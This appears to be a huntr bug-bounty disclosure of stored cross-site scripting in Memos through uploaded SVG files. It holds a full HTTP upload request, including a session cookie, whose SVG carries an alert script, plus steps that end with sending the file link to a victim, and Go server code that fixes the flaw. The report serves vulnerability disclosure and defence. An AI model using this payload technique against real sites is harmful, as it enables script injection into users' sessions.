huntr | juylang | 459B55C1-22F5-4556-9CDA-9B86AA91582F
History: Dec 20, 2022 - 11:32 a.m.

Cross-site scripting - Stored via upload `.svg` file in

2022-12-20 11:32:15
juylang
www.huntr.dev
Tags: cross-site scripting, stored file upload, image format handling, security vulnerability, proof of concept, file upload interaction, content-type header, svg file, web security, bug bounty program

0.001 Low

EPSS

Percentile

20.3%

Description

When a user uploads a file with a .svg extension and then accesses it directly, the server responds with Content-Type: image/svg+xml. The browser therefore renders the SVG as a full document in the application's origin, so any script embedded in the SVG is executed, much as an uploaded HTML file would be.

Proof of Concept

POST /api/resource HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MTUzMjkzMXxEdi1EQkFFQ180UUFBUkFCRUFBQUhfLUVBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOG89fDYqserGzpcgkE9G0qSf_dQ9Q8rHAMeM_lb9V-vZecyd
Content-Length: 462
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json, text/plain, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFu7Yl3xXBKej60Xw
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.usememos.com
Referer: https://demo.usememos.com/?text=1&shortcutId=1
Accept-Encoding: gzip, deflate

------WebKitFormBoundaryFu7Yl3xXBKej60Xw
Content-Disposition: form-data; name="file"; filename="xss.svg"
Content-Type: image/svg+xml

<svg width="100%" height="100%" viewBox="0 0 100 100"
     xmlns="http://www.w3.org/2000/svg">
  <circle cx="50" cy="50" r="45" fill="green"
          id="foo"/>
  <script type="text/javascript">
    // <![CDATA[
      alert(window.origin);
    // ]]>
  </script>
</svg>
------WebKitFormBoundaryFu7Yl3xXBKej60Xw--

Steps to reproduce

  1. Prepare a file xss.svg with content: <script type="text/javascript">// <![CDATA[alert(window.origin);// ]]></script>
  2. Upload the xss.svg file in Resource library -> Upload
  3. Copy the link to the uploaded file and send it to the victim
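The usual server-side mitigation for the issue described above is to deliver uploaded SVG (and other script-capable types) so that the browser never executes it in the application's origin: `X-Content-Type-Options: nosniff`, a forced download via `Content-Disposition: attachment`, and a `Content-Security-Policy` that disables script and sandboxes the document if it is rendered anyway. The Go handler below is an added example written for this report, not code from the Memos project; `serveUpload`, `isActiveContent` and the sample SVG are hypothetical, and the content type passed in is assumed to be one the server determined itself rather than the client-supplied multipart header.

```go
package main

import (
	"fmt"
	"mime"
	"net/http"
	"net/http/httptest"
)

// Constructed sample: the kind of script-bearing SVG the report uploads.
const sampleSVG = `<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>`

// Media types a browser will run script from if it navigates to the file
// directly. image/svg+xml is the case in this report.
var activeTypes = map[string]bool{
	"image/svg+xml":         true,
	"text/html":             true,
	"application/xhtml+xml": true,
}

// isActiveContent reports whether a stored Content-Type (parameters such as
// charset included) would be treated as an active document when served.
// Unparseable types are treated as active so the handler fails closed.
func isActiveContent(contentType string) bool {
	mt, _, err := mime.ParseMediaType(contentType) // mt is lowercased
	if err != nil {
		return true
	}
	return activeTypes[mt]
}

// serveUpload writes an uploaded resource with headers that keep it from
// executing in the application's origin: nosniff always, and for active
// types a forced download plus a CSP that disables script and sandboxes the
// document even if a client still renders it. <img src> embedding of the
// SVG keeps working, since browsers ignore Content-Disposition for images.
func serveUpload(w http.ResponseWriter, contentType string, body []byte) {
	h := w.Header()
	h.Set("Content-Type", contentType)
	h.Set("X-Content-Type-Options", "nosniff")
	if isActiveContent(contentType) {
		h.Set("Content-Disposition", "attachment")
		h.Set("Content-Security-Policy", "default-src 'none'; sandbox")
	}
	w.WriteHeader(http.StatusOK)
	w.Write(body)
}

func main() {
	rec := httptest.NewRecorder() // stand-alone demo against a recorder
	serveUpload(rec, "image/svg+xml", []byte(sampleSVG))
	fmt.Println(rec.Header())
}
```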
